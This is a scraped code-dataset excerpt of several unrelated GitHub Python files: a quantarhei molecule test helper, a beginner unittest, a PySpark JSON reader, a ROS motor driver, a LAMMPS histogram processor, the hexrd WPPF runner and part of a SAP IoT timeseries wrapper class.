inputs\n if nstates != 2:\n raise Exception()\n \n # set parameters\n gap1 = convert(12000,\"1/cm\", to=\"int\")\n \n energies1 = numpy.zeros(nstates)\n for s in range(nstates):\n energies1[s] = s*gap1\n \n if homo:\n gap2 = convert(12000,\"1/cm\", to=\"int\")\n else:\n gap2 = convert(12300,\"1/cm\", to=\"int\")\n \n energies2 = numpy.zeros(nstates)\n for s in range(nstates):\n energies2[s] = s*gap2\n \n # molecules\n m1 = Molecule(elenergies=energies1)\n m2 = Molecule(elenergies=energies2)\n \n # set transition dipole moments\n dip1 = [0.0, 2.0, 0.0]\n dip2 = [0.0, 1.3, 1.4]\n m1.set_dipole(0, 1, dip1)\n m2.set_dipole(0, 1, dip2)\n \n #set molecular positions\n r1 = [0.0, 0.0, 0.0]\n r2 = [5.0, 0.0, 0.0]\n m1.position = r1\n m2.position = r2\n \n return [m1, m2]\n \n elif (N == 3) and (nst == 2):\n \n nstates = nst\n \n # check inputs\n if nstates != 2:\n raise Exception()\n \n # set parameters\n gap1 = convert(12000, \"1/cm\", to=\"int\")\n energies1 = numpy.zeros(nstates)\n for s in range(nstates):\n energies1[s] = s*gap1\n \n if homo:\n gap2 = convert(12000, \"1/cm\", to=\"int\")\n gap3 = gap2\n else:\n gap2 = convert(12300, \"1/cm\", to=\"int\")\n 
gap3 = convert(12350, \"1/cm\", to=\"int\")\n energies2 = numpy.zeros(nstates)\n energies3 = numpy.zeros(nstates)\n for s in range(nstates):\n energies2[s] = s*gap2\n energies3[s] = s*gap3\n \n # molecules\n m1 = Molecule(elenergies=energies1)\n m2 = Molecule(elenergies=energies2)\n m3 = Molecule(elenergies=energies3)\n \n # set transition dipole moments\n dip1 = [0.0, 2.0, 0.0]\n dip2 = [0.0, 1.3, 1.4]\n dip3 = [1.0, 1.2, 0.0]\n m1.set_dipole(0, 1, dip1)\n m2.set_dipole(0, 1, dip2)\n m3.set_dipole(0, 1, dip3)\n \n #set molecular positions\n r1 = [0.0, 0.0, 0.0]\n r2 = [5.0, 0.0, 0.0]\n r3 = [0.0, 0.0, 5.0]\n m1.position = r1\n m2.position = r2\n m3.position = r3\n \n return [m1, m2, m3]\n \n else:\n \n return None\n ","repo_name":"tmancal74/quantarhei","sub_path":"quantarhei/builders/aggregate_test.py","file_name":"aggregate_test.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"52"} +{"seq_id":"33370094197","text":"# !/usr/bin/python3\r\n\r\n# Import\r\nimport unittest\r\nfrom person import Person\r\nfrom Student import Student\r\nfrom Instructor import Instructor\r\n\r\n# Create objects\r\nperson = Person()\r\nstudent = Student()\r\ninstructor = Instructor()\r\n\r\nclass TestClasses(unittest.TestCase) :\r\n \r\n def test_Equal(self) :\r\n self.assertEqual(person.DOB, \"11/11/11\")\r\n self.assertEqual(instructor.salary, \"$45,000.00\")\r\n del person.name\r\n del person.DOB\r\n del instructor.salary\r\n\r\n def test_Is(self) : \r\n self.assertIs(instructor.salary, int())\r\n\r\n def test_None(self) : \r\n self.assertIsNone(person.name)\r\n self.assertIsNone(student.major)\r\n\r\n def test_Init(self) : \r\n self.assertIsNone(person.__init__())\r\n self.assertIsNone(student.__init__())\r\n self.assertIsNone(instructor.__init__())\r\n\r\n def test_Instance(self) : \r\n self.assertIsInstance(person, Person)\r\n self.assertIsInstance(student, Student)\r\n self.assertIsInstance(instructor, Instructor)\r\n\r\nif __name__ == \"__main__\" : \r\n person.name = \"Jack Johnson\"\r\n person.DOB = \"11/11/11\"\r\n instructor.salary = \"$45,000.00\"\r\n unittest.main()\r\n","repo_name":"Topazstix/learning_python","sub_path":"extra/iter_gener_decor/unittest_.py","file_name":"unittest_.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74414044645","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import avg, max, min\nimport sys, json\n\n#create sample data as an array\ndata = [\n {'name':'Jack', 'age':50, 'company name':'Uber'},\n {'name':'Emily', 'age':24, 'company name':'Amazon'}\n]\n\n#define explicit schema\nschema = 'name STRING , age INT, `company name` STRING'\n\nif __name__ == '__main__':\n\n #write json data to file\n jsonstring = json.dumps(data)\n print(jsonstring)\n with open('data.json','w') as f:\n f.write(jsonstring)\n\n #read the json file\n with open('data.json','r') as f:\n print(json.load(f))\n spark = (SparkSession\n .builder\n .appName(sys.argv[0])\n .getOrCreate())\n\n df = spark.read.schema(schema).json('data.json')\n\n df.show()\n","repo_name":"krishansubudhi/sparkparactice","sub_path":"read_json.py","file_name":"read_json.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37153899394","text":"import rospy\n\ntry:\n import RPi.GPIO as GPIO\nexcept:\n import 
Mock.GPIO as GPIO\n\nfrom joyit.L298N_pin_config import L298NPinConfig\n\nclass L298NDriver:\n def __init__(self,\n name,\n config: L298NPinConfig,\n max_speed=rospy.get_param(\"MAX_SPEED_MOTOR\")) -> None:\n \"\"\"\n Init communication, set default settings, ...\n \"\"\"\n self.name = name\n self.config = config\n self.current_speed = 0\n self.max_speed = max_speed\n\n self.setup_pins()\n\n def setup_pins(self) -> None:\n \"\"\"\n Setup the pins for the L298N driver.\n \"\"\"\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(self.config.IN1, GPIO.OUT)\n GPIO.setup(self.config.IN2, GPIO.OUT)\n GPIO.setup(self.config.IN3, GPIO.OUT)\n GPIO.setup(self.config.IN4, GPIO.OUT)\n GPIO.setup(self.config.ENA, GPIO.OUT)\n GPIO.setup(self.config.ENB, GPIO.OUT)\n\n # GPIO.PWM finds which channel is used by the pin number\n self.pwm_a = GPIO.PWM(self.config.ENA, rospy.get_param(\"PWM_FREQUENCY\"))\n self.pwm_b = GPIO.PWM(self.config.ENB, rospy.get_param(\"PWM_FREQUENCY\"))\n\n self.pwm_a.start(0)\n self.pwm_b.start(0)\n\n self.set_direction(rospy.get_param(\"DIR_FORWARD\"))\n\n def set_speed(self, speed: int) -> None:\n \"\"\"\n Give a speed that the motor will try to reach.\n \"\"\"\n self.current_speed = min(speed, self.max_speed)\n self.pwm_a.ChangeDutyCycle(self.current_speed)\n self.pwm_b.ChangeDutyCycle(self.current_speed)\n\n def set_direction(self, direction: int) -> None:\n \"\"\"\n Set the direction of the motor.\n \"\"\"\n if direction == rospy.get_param(\"DIR_FORWARD\"):\n GPIO.output(self.config.IN1, 0)\n GPIO.output(self.config.IN2, 1)\n GPIO.output(self.config.IN3, 0)\n GPIO.output(self.config.IN4, 1)\n elif direction == rospy.get_param(\"DIR_BACKWARD\"):\n GPIO.output(self.config.IN1, 1)\n GPIO.output(self.config.IN2, 0)\n GPIO.output(self.config.IN3, 1)\n GPIO.output(self.config.IN4, 0)\n\n def get_speed(self) -> int:\n \"\"\"\n Return current speed of the motor\n \"\"\"\n return self.current_speed\n\n def get_status(self):\n \"\"\"\n Get hardware information from the motor\n \"\"\"\n return {\n \"name\": self.name,\n 'current_speed': self.current_speed,\n }\n\n def cleanup(self):\n \"\"\"\n Cleanup the GPIO pins.\n \"\"\"\n GPIO.cleanup()\n","repo_name":"McFrappe/LAFF-Platooning","sub_path":"src/joyit/src/joyit/L298N_driver.py","file_name":"L298N_driver.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20401321747","text":"import numpy as np\nimport pickle\nimport sys\n\nfrom lammpstools import HistogramLoader, CondensedArray_oTwo, CondensedArray_oThree\n\n\ndef process_histos(basename,eof,pos_bins,cutoff,runslist,nskip=None,\n theta_bins=None,dtype='rdf',varname='c_myhistos',\n histdict=None,runstarts=None,t_start=-1):\n\n \"\"\"\n \n Process multiple runs of a single binned 'histo' type\n of data, and put into a final dictionary with averages of the\n runs and other information.\n\n Parameters\n ----------\n basename : string\n First part of the file name (prior to the run\n number).\n eof : string\n Second part of the file name (after the run number).\n pos_bins : int\n Number of position bins expected in the files.\n cutoff : float\n Distance that binning is cut off at as expected in the\n files.\n runslist : 1D array like of ints\n List of runs to scan over.\n nskip : int (optional)\n Number of position bins to be skipped as expected in\n the files. Default is None. 
Only used for certain\n values of the 'dtype' argument (see below).\n theta_bins : int (optional)\n Number of theta bins expected in the files. Default\n is None. Only used for certain values of the 'dtype'\n argument (see below).\n dtype : string (optional)\n Type of data to be expected. Acceptable arguments are\n 'rdf', '3bod', or '3bodfull.' Default is 'rdf'.\n varname : string (optional)\n prefix name of header in # row output of data. Default\n is 'c_myhistos'.\n histdict : dict (optional)\n Dictionary labeling columns in the rdf input files and assigning\n them a number in the output files. Default is None, which then\n chooses an appropriate histdict dependent on data type.\n runstarts : 1D list of strings (optional)\n Strings to insert in basename for each different run.\n Length of list should be same as runslist length above.\n Default is None.\n t_start : integer (optional)\n A single start time for all the different runs. Necessary if\n the runs all start at different times to average correctly\n (assuming same end time and time spacing). Default is -1.\n\n Returns\n -------\n finaldict : dictionary\n Contains average values for the different binned quantities,\n as well as other useful information that is shared by all\n runs scanned over.\n missed_runs : list of ints\n Every time a data file from a specific run is missing, the\n run number is appended to this list.\n \n\n \"\"\"\n\n if dtype == 'rdf':\n if histdict == None:\n histdict = {'g' : 2, 'U_1' : 3, 'C_1' : 4, 'U_2' : 5,\n 'C_2' : 6, 'UC' : 7, 'D_2' : 8, 'ncoord' : 9}\n elif dtype == '3bod':\n if nskip == None:\n raise ValueError(\"need nskip argument for dtype='3bod'.\")\n if histdict == None:\n histdict={'g3' : 3 , 'g3cos' : 4}\n elif dtype == '3bodfull':\n if nskip == None:\n raise ValueError(\"need nskip argument for dtype='3bodfull'.\")\n if theta_bins == None:\n raise ValueError(\"need theta_bins argument for dtype='3bodfull' dtype.\")\n if histdict == None:\n histdict={'g3' : 4 }\n\n missed_runs = []\n # store the times of measurement (same for each of the nrun runs)\n times = []\n\n # store all of the measurement data\n histlist = []\n\n print(histdict)\n\n count = 0\n\n nruns = len(runslist)\n tmpname = basename\n for run_index,run in enumerate(runslist):\n\n if runstarts != None:\n basename = tmpname.replace('HERE',runstarts[run_index])\n\n fname = basename + f'{run}'+eof\n print(fname)\n try:\n hl = HistogramLoader(fname)\n except FileNotFoundError:\n missed_runs.append(run)\n print(f'missed run {run} of {fname}')\n\n continue\n\n try:\n dat = hl.data[0]\n\n\n except IndexError:\n missed_runs.append(run)\n print(f'missed run {run} of {fname}')\n continue\n\n\n\n\n if dtype == 'rdf':\n tmpbinnum = pos_bins\n elif dtype == '3bod':\n tmpbinnum = int((pos_bins-2*nskip)*(pos_bins-2*nskip+1))//2\n elif dtype == '3bodfull':\n tmpbinnum = int((pos_bins-2*nskip)*(pos_bins-2*nskip+1)\n *theta_bins)//2\n \n nbins = dat['nbins']\n \n if tmpbinnum != nbins:\n raise ValueError('bin args do not match data length.')\n\n num_neglected_timesteps = 0\n # iterate over each measurement of the run\n for timestep,data_t in enumerate(hl.data):\n\n if int(hl.data[timestep]['timestep']) < t_start:\n num_neglected_timesteps += 1\n continue\n\n if count == 0:\n\n\n # save all times that histograms were measured (same for each run)\n times.append(hl.data[timestep]['timestep'])\n\n\n\n # at each timestep, create arrays of shape \n # (nruns,nbins) for each histogram\n\n histlist.append({})\n\n for key,value in histdict.items():\n 
histlist[timestep-num_neglected_timesteps][key] = np.empty([nruns,nbins],float)\n\n            for key,value in histdict.items():\n                histlist[timestep-num_neglected_timesteps][key][count,:] = data_t[f'{varname}[{value}]']\n\n        count += 1\n\n    if dtype == '3bod':\n        eo = CondensedArray_oTwo(pos_bins,nskip)\n        reshape = eo.reshape\n\n    elif dtype == '3bodfull':\n        eo = CondensedArray_oThree(pos_bins,theta_bins,nskip)\n        reshape = eo.reshape\n    elif dtype == 'rdf':\n\n        def reshape(x):\n            return x\n\n    # list with items containing dicts of averages and std devs\n    # at each timestep\n\n    estimators = []\n\n\n    print(f\"count={count}\")\n    # iterate over the stored timesteps via histlist, since hl may be\n    # undefined if every requested run was missing\n    for timestep in range(len(histlist)):\n        estimators.append({})\n\n        for key,value in histlist[timestep].items():\n            estimators[timestep][key] = reshape(np.mean(value[:count,:],axis=0))\n            estimators[timestep][key+'_std'] = reshape(np.std(value[:count,:],axis=0))\n\n\n\n    rs = (np.linspace(0,float(cutoff),num=pos_bins,endpoint=False)\n          +0.5*float(cutoff)/pos_bins)\n\n\n    # store final values of the averaged histograms together with shared metadata\n\n\n\n\n    if dtype == '3bod':\n        finaldict = {'estimators' : estimators, 'nskip' : nskip, 'r3s' : rs,\n                     'timesteps' : times, 'nruns' : count }\n\n    elif dtype == '3bodfull':\n        thetas = (np.linspace(0,np.pi,num=theta_bins,endpoint=False)\n                  +0.5*np.pi/theta_bins)\n        finaldict = {'estimators' : estimators, 'nskip' : nskip, 'r3s' : rs,\n                     'thetas' : thetas, 'timesteps' : times, 'nruns' : count }\n\n    elif dtype == 'rdf':\n        finaldict = {'estimators' : estimators, 'r' : rs,\n                     'timesteps' : times , 'nruns' : count }\n\n    return finaldict,missed_runs\n\n\n\nif __name__ == \"__main__\":\n\n\n    # example parameter values for a demo run; the original script left these\n    # undefined, so these placeholders must be adjusted to match your data files\n    bins = 100\n    cutoff = 10.0\n    pos_bins = bins\n    rho, fp, epsilon, Pi = 0.1, 1.0, 1.0, 1.0\n    runslist = range(1, 11)\n\n    basename = f'histosbins{bins}cutoff{cutoff}'\n    basename += f'_{rho}_{fp}_{epsilon}_{Pi}'\n\n    finaldict,missed_runs = process_histos(basename,'.rdf',pos_bins,cutoff,runslist)\n","repo_name":"samueljmcameron/clusterprocess_ss_abp","sub_path":"clusterprocess_ss_abp/process_histos.py","file_name":"process_histos.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22276838076","text":"import copy\n\nfrom PySide2.QtCore import QCoreApplication, QObject, QThreadPool, Signal\n\nfrom hexrd.ui.calibration.wppf_options_dialog import WppfOptionsDialog\nfrom hexrd.ui.constants import OverlayType\nfrom hexrd.ui.hexrd_config import HexrdConfig\nfrom hexrd.ui.progress_dialog import ProgressDialog\nfrom hexrd.ui.utils import make_new_pdata\n\n\nclass WppfRunner(QObject):\n\n    progress_text = Signal(str)\n\n    def __init__(self, parent=None):\n        super().__init__(parent)\n\n        self.thread_pool = QThreadPool(self)\n        self.progress_dialog = ProgressDialog(parent)\n        self.progress_text.connect(self.progress_dialog.setLabelText)\n\n    def clear(self):\n        self.wppf_options_dialog = None\n\n    def run(self):\n        self.validate()\n\n        # We will go through these steps:\n        # 1. Select options\n        # 2. Run WPPF\n        self.select_options()\n\n    def validate(self):\n        if not self.visible_powder_overlays:\n            raise Exception('At least one visible powder overlay is required')\n\n    @property\n    def visible_powder_overlays(self):\n        return [\n            x for x in HexrdConfig().overlays\n            if (x['type'] == OverlayType.powder and x['visible'])\n        ]\n\n    def select_options(self):\n        dialog = WppfOptionsDialog(self.parent())\n        dialog.accepted.connect(self.wppf_options_selected)\n        dialog.rejected.connect(self.clear)\n        dialog.show()\n        self.wppf_options_dialog = dialog\n\n    def wppf_options_selected(self):\n        # FIXME: run this in a background thread (code for this is\n        # commented out below). 
The reason we can't do it right now\n # is because the spline background method pops up a dialog\n # with pylab, and we can't interact with it if it is running\n # in a background thread. If that gets changed, we can run\n # this in a background thread.\n self.run_wppf()\n self.wppf_finished()\n\n # Run WPPF in a background thread\n # self.progress_dialog.setWindowTitle('Running WPPF')\n # self.progress_dialog.setRange(0, 0) # no numerical updates\n\n # worker = AsyncWorker(self.run_wppf)\n # self.thread_pool.start(worker)\n\n # worker.signals.result.connect(self.wppf_finished)\n # worker.signals.finished.connect(self.progress_dialog.accept)\n # self.progress_dialog.exec_()\n\n def run_wppf(self):\n dialog = self.wppf_options_dialog\n self.wppf_object = dialog.create_wppf_object()\n\n for i in range(dialog.refinement_steps):\n self.wppf_object.RefineCycle()\n self.rerender_wppf()\n\n self.write_lattice_params_to_materials()\n\n def rerender_wppf(self):\n HexrdConfig().wppf_data = list(self.wppf_object.spectrum_sim.data)\n HexrdConfig().rerender_wppf.emit()\n\n # Process events to make sure it visually updates.\n # If this causes issues, we can post self.wppf_object.RefineCycle()\n # calls to the event loop in the future instead.\n QCoreApplication.processEvents()\n\n def wppf_finished(self):\n self.update_param_values()\n\n def write_lattice_params_to_materials(self):\n for name, wppf_mat in self.wppf_object.phases.phase_dict.items():\n mat = HexrdConfig().material(name)\n\n # Convert units from nm to angstroms\n lparms = copy.deepcopy(wppf_mat.lparms)\n for i in range(3):\n lparms[i] *= 10.0\n\n mat.latticeParameters = lparms\n make_new_pdata(mat)\n HexrdConfig().flag_overlay_updates_for_material(name)\n\n if mat is HexrdConfig().active_material:\n HexrdConfig().active_material_modified.emit()\n\n HexrdConfig().overlay_config_changed.emit()\n\n def update_param_values(self):\n # Update the param values with their new values from the wppf_object\n params = self.params\n if not params:\n return\n\n new_params = self.wppf_object.params\n for k, v in params.items():\n v[0] = new_params[k].value\n\n @property\n def params(self):\n conf = HexrdConfig().config['calibration']\n return conf.get('wppf', {}).get('params')\n\n def update_progress_text(self, text):\n self.progress_text.emit(text)\n","repo_name":"cjh1/hexrdgui","sub_path":"hexrd/ui/calibration/wppf_runner.py","file_name":"wppf_runner.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"41460981958","text":"\"\"\"\nTimeseries module can be used to retrieve timeseries data from the SAP iot abstract timeseries api.\n\nHere we define some convenience wrappers for timeseries data.\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom collections.abc import Iterable\nfrom datetime import datetime\nfrom typing import TYPE_CHECKING, Union, Any, Callable\nimport logging\n\nimport pandas as pd\nfrom plotnine import ggplot, geom_point, aes, facet_grid, geom_line\nfrom plotnine.themes import theme\nfrom plotnine.scales import scale_x_datetime\nfrom sklearn.preprocessing import StandardScaler\n\nimport sailor.assetcentral.indicators as ac_indicators\nfrom sailor.utils.plot_helper import _default_plot_theme\nfrom sailor.utils.timestamps import _any_to_timestamp, _calculate_nice_sub_intervals\nfrom sailor.utils.utils import WarningAdapter\n\nif TYPE_CHECKING:\n from ..assetcentral.indicators import IndicatorSet, AggregatedIndicatorSet\n from 
..assetcentral.equipment import EquipmentSet\n\nLOG = logging.getLogger(__name__)\nLOG.addHandler(logging.NullHandler())\nLOG = WarningAdapter(LOG)\n\n\nclass TimeseriesDataset(object):\n    \"\"\"A Wrapper class to make accessing timeseries data from SAP iot more convenient.\"\"\"\n\n    def __init__(self, df: pd.DataFrame, indicator_set: IndicatorSet, equipment_set: EquipmentSet,\n                 nominal_data_start: pd.Timestamp, nominal_data_end: pd.Timestamp,\n                 is_normalized: bool = False):\n        \"\"\"\n        Create a TimeseriesDataset.\n\n        indicator_set must be an IndicatorSet containing all indicators occurring in the data columns of the\n        dataframe, and equipment_set must be an EquipmentSet containing all equipments occurring in the equipment_id\n        column of the data.\n        \"\"\"\n        self._df = df.query('(timestamp >= @nominal_data_start) & (timestamp < @nominal_data_end)')\n        self.is_normalized = is_normalized\n        self._equipment_set = equipment_set\n        self._indicator_set = indicator_set\n        self.nominal_data_start = nominal_data_start\n        self.nominal_data_end = nominal_data_end\n        self.type = 'EQUIPMENT'  # current wrapper type is always 'equipment'\n\n        df_equipment_ids = set(df['equipment_id'].unique())\n        set_equipment_ids = set(equipment.id for equipment in equipment_set)\n        if df_equipment_ids - set_equipment_ids:\n            raise RuntimeError('Not all equipment ids in the data are provided in the equipment set.')\n        if set_equipment_ids - df_equipment_ids:\n            LOG.log_with_warning(\n                'There is no data in the dataframe for some of the equipments in the equipment set.')\n            self._equipment_set = self._equipment_set.filter(id=df_equipment_ids)\n\n        df_indicator_ids = set(df.columns) - set(self.get_index_columns(include_model=False))\n        set_indicator_ids = set(indicator._unique_id for indicator in indicator_set)\n        if df_indicator_ids - set_indicator_ids:\n            raise RuntimeError('Not all indicator ids in the data are provided in the indicator set.')\n        if set_indicator_ids - df_indicator_ids:\n            LOG.log_with_warning(\n                'There is no data in the dataframe for some of the indicators in the indicator set.')\n            self._indicator_set = self._indicator_set.filter(_unique_id=df_indicator_ids)\n\n    @property\n    def indicator_set(self):\n        \"\"\"Return all Indicators present in the TimeseriesDataset.\"\"\"\n        return self._indicator_set\n\n    @property\n    def equipment_set(self):\n        \"\"\"Return all equipment present in the TimeseriesDataset.\"\"\"\n        return self._equipment_set\n\n    def get_key_columns(self, speaking_names=False, include_model=False):\n        \"\"\"\n        Return those columns of the data that identify the asset.\n\n        Currently we only support asset type 'Equipment' so this will always return columns based on the equipment.\n        In the future other types (like System) will be supported here.\n\n        Parameters\n        ----------\n        speaking_names\n            False, return key columns\n            True, return corresponding names of key columns\n\n        Example\n        -------\n        Get key columns of the indicator data set 'my_indicator_data'::\n\n            my_indicator_data.get_key_columns()\n        \"\"\"\n        if self.type != 'EQUIPMENT':\n            raise NotImplementedError('Currently only Equipment is supported as base object for timeseries data.')\n\n        if include_model:\n            if speaking_names:\n                return ['equipment_name', 'model_name']\n            else:\n                return ['equipment_id', 'model_id']\n        else:\n            if speaking_names:\n                return ['equipment_name']\n            else:\n                return ['equipment_id']\n\n    @staticmethod\n    def get_time_column():\n        \"\"\"Return the name of the column containing the time information.\"\"\"\n        return 'timestamp'\n\n    def get_feature_columns(self, 
speaking_names=False):\n        \"\"\"\n        Get the names of all feature columns.\n\n        Parameters\n        ----------\n        speaking_names\n            False, returns feature columns of a data set\n            True, returns corresponding names of feature columns\n\n        Example\n        -------\n        Get Template id, Indicator group name and Indicator name of columns including indicator values in the\n        data set 'my_indicator_data'::\n\n            my_indicator_data.get_feature_columns(speaking_names=True)\n\n        \"\"\"\n        if speaking_names:\n            return list(self._indicator_set._unique_id_to_names().values())\n        return list(self._indicator_set._unique_id_to_constituent_ids().keys())\n\n    def get_index_columns(self, speaking_names=False, include_model=False) -> list:\n        \"\"\"Return the names of all index columns (key columns and time column).\"\"\"\n        return [*self.get_key_columns(speaking_names, include_model), self.get_time_column()]\n\n    def as_df(self, speaking_names=False, include_model=False):\n        \"\"\"\n        Return the data stored within this TimeseriesDataset object as a pandas dataframe.\n\n        By default the data is returned with opaque column headers. If speaking_names is set to true, the data is\n        converted such that equipment_id and model_id are replaced by human-readable names, and the opaque\n        column headers are replaced by a hierarchical index of template_id, indicator_group_name, indicator_name and\n        aggregation_function.\n        \"\"\"\n        if include_model:\n            model_ids = pd.DataFrame(\n                [(equi.id, equi.model_id) for equi in self._equipment_set], columns=['equipment_id', 'model_id']\n            )\n            df = pd.merge(self._df, model_ids, on='equipment_id')\n        else:\n            df = self._df\n\n        if speaking_names:\n            return self._transform(df, include_model=include_model)\n        else:\n            return df.set_index(self.get_index_columns(include_model=include_model))\n\n    def _transform(self, df, include_model):\n        if include_model:\n            static_column_mapping = {'equipment_id': 'equipment_name', 'model_id': 'model_name'}\n            translator = {'equipment_id': {}, 'model_id': {}}\n            for equipment in self._equipment_set:\n                translator['equipment_id'][equipment.id] = equipment.name\n                translator['model_id'][equipment.model_id] = equipment.model_name\n        else:\n            static_column_mapping = {'equipment_id': 'equipment_name'}\n            translator = {'equipment_id': {}}\n            for equipment in self._equipment_set:\n                translator['equipment_id'][equipment.id] = equipment.name\n\n        data = (\n            df.replace(translator)\n            .rename(columns=static_column_mapping)\n            .set_index(self.get_index_columns(speaking_names=True, include_model=include_model))\n            .rename(columns=self._indicator_set._unique_id_to_names())\n        )\n        if len(data.columns) > 0:\n            data.columns = pd.MultiIndex.from_tuples(data.columns)\n\n        return data\n\n    def plot(self, start=None, end=None, indicator_set=None, equipment_set=None):\n        \"\"\"\n        Plot the timeseries data stored within this wrapper.\n\n        The plot will create different panels for each indicator_group_name and template in the data, as well as each\n
        indicator. Data from different equipment will be represented by different colors. The plotnine object\n        returned by this method will be rendered in jupyter notebooks, but can also be further modified by the caller.\n\n        Parameters\n        ----------\n        start\n            Optional start time from which the timeseries data is plotted.\n        end\n            Optional end time until which the timeseries data is plotted.\n        indicator_set\n            Optional Indicators to be plotted.\n        equipment_set\n            Optional equipment whose indicator data is plotted.\n\n        Returns\n        -------\n        plot\n            Line charts of timeseries data.\n\n        Example\n        -------\n        Plot all Indicators for a period from 2020-07-02 to 2020-09-01 in the data set 'my_indicator_data'::\n\n            my_indicator_data.plot('2020-07-02','2020-09-01')\n        \"\"\"\n        key_vars = self.get_index_columns(include_model=False)\n        time_column = self.get_time_column()\n\n        if indicator_set is None:\n            indicator_set = self._indicator_set\n        feature_vars = [indicator._unique_id for indicator in indicator_set]\n        name_mapping = indicator_set._unique_id_to_names()\n\n        if equipment_set is None:\n            equipment_set = self._equipment_set\n        equipment_mapping = {equipment.id: equipment.name for equipment in equipment_set}\n        selected_equipment_ids = equipment_mapping.keys()\n\n        start = _any_to_timestamp(start, default=self._df[time_column].min())\n        end = _any_to_timestamp(end, default=self._df[time_column].max())\n\n        if self._df.empty:\n            raise RuntimeError('There is no data in this dataset.')\n\n        data = self._df \\\n            .query(f'({time_column} >= @start) & ({time_column} <= @end)') \\\n            .query('equipment_id in @selected_equipment_ids') \\\n            .filter(items=key_vars + feature_vars)\n        result_equipment_ids = set(data['equipment_id'])\n\n        if data.empty:\n            raise RuntimeError('There is no data in the dataset for the selected equipments and indicators.')\n\n        # find equipment that are dropped from the plot and log them to the user\n        empty_equipment_ids = set(selected_equipment_ids) - result_equipment_ids\n        if empty_equipment_ids:\n            LOG.log_with_warning(\n                f'Following equipment show no data and are removed from the plot: {empty_equipment_ids}')\n            selected_equipment_ids = set(selected_equipment_ids) - empty_equipment_ids\n        # also indicators without data need to be removed from the plot due to unknown Y axis limits\n        empty_indicators = data.columns[data.isna().all()].tolist()\n        if empty_indicators:\n
            # Todo: speaking names in the log below? Currently using our uuid\n            LOG.log_with_warning(\n                f'Following indicators show no data and are removed from the plot: {empty_indicators}')\n            feature_vars = set(feature_vars) - set(empty_indicators)\n\n        query_timedelta = end - start\n        break_interval = _calculate_nice_sub_intervals(query_timedelta, 5) # at least 5 axis breaks\n        first_break = start.floor(break_interval, ambiguous=False, nonexistent='shift_backward')\n        last_break = end.ceil(break_interval, ambiguous=False, nonexistent='shift_forward')\n        x_breaks = pd.date_range(first_break, last_break, freq=break_interval)\n\n        if break_interval < pd.Timedelta('1 day'):\n            date_labels = '%Y-%m-%d %H:%M:%S'\n        else:\n            date_labels = '%Y-%m-%d'\n\n        facet_grid_definition = 'indicator + template + indicator_group ~ .'\n        facet_assignment = dict(\n            template=lambda x: x.Feature.apply(lambda row: name_mapping[row][0]),\n            indicator_group=lambda x: x.Feature.apply(lambda row: name_mapping[row][1]),\n            indicator=lambda x: x.Feature.apply(lambda row: name_mapping[row][2])\n        )\n\n        if isinstance(self._indicator_set, ac_indicators.AggregatedIndicatorSet):\n            facet_grid_definition = 'aggregation + indicator + template + indicator_group ~ .'\n            facet_assignment['aggregation'] = lambda x: x.Feature.apply(lambda row: name_mapping[row][3])\n\n        aggregation_interval = _calculate_nice_sub_intervals(query_timedelta, 100) # at least 100 data points\n        groupers = [*self.get_key_columns(include_model=False), pd.Grouper(key=time_column, freq=aggregation_interval)]\n        molten_data = (\n            data.groupby(groupers)\n            .agg('mean')\n            .reset_index()\n            .dropna(axis=1, how='all')\n            .melt(id_vars=key_vars, value_vars=feature_vars, var_name='Feature')\n            .assign(**facet_assignment)\n            .replace({'equipment_id': equipment_mapping})\n            .rename(columns={'equipment_id': 'equipment'})\n        )\n\n        facet_row_count = len(feature_vars) + len(molten_data.groupby(['template', 'indicator_group']))\n\n        plot = (\n            ggplot(molten_data, aes(x=self.get_time_column(), y='value', color='equipment')) +\n            geom_point() + geom_line() +\n            facet_grid(facet_grid_definition, scales='free') +\n            _default_plot_theme() +\n            theme(figure_size=(10, 3 * facet_row_count)) +\n            scale_x_datetime(limits=(start, end), date_labels=date_labels, breaks=x_breaks)\n        )\n\n        return plot\n\n    def normalize(self, fitted_scaler=None, scaler=StandardScaler(copy=True, with_mean=True, with_std=True)) \\\n            -> tuple[TimeseriesDataset, Any]:\n        \"\"\"\n        Normalize a data frame using scaler in normalization_factors.\n\n        Parameters\n        ----------\n        fitted_scaler\n            Optional fitted scaler, to be used to normalize self._df\n        scaler\n
            Type of scaler to use for normalization. Default settings imply x -> (x-m)/s, with m = mean and s = std.\n            Properties are computed along the columns.\n\n        Returns\n        -------\n        new_wrapper\n            TimeseriesDataset with self._df updated to be the normalized dataframe.\n        fitted_scaler\n            Fitted scaler to be used to normalize the data.\n\n        Example\n        -------\n        Get normalized values for indicators in the indicator data set 'My_indicator_data'::\n\n            My_indicator_data.normalize()[0]\n        \"\"\"\n        features = [column for column in self._df.columns if column not in self.get_index_columns(include_model=False)]\n        if fitted_scaler is None and self.is_normalized:\n            raise RuntimeError(\"There is no fitted scaler but dataset is already normalized.\")\n        if fitted_scaler is None:\n            # normalize the data and save normalization factors to normalization_factors\n            fitted_scaler = scaler.fit(self._df[features])\n            LOG.debug('No scaler provided for normalization, fitting scaler to dataset: %s', fitted_scaler)\n\n        normalized_df = self._df.copy()\n        normalized_df[features] = fitted_scaler.transform(normalized_df[features])\n        new_wrapper = TimeseriesDataset(normalized_df, self._indicator_set,\n                                        self._equipment_set,\n                                        self.nominal_data_start, self.nominal_data_end,\n                                        is_normalized=True)\n\n        return new_wrapper, fitted_scaler\n\n    def filter(self, start: Union[str, pd.Timestamp, datetime] = None,\n               end: Union[str, pd.Timestamp, datetime] = None, equipment_set: EquipmentSet = None,\n               indicator_set: Union[IndicatorSet, 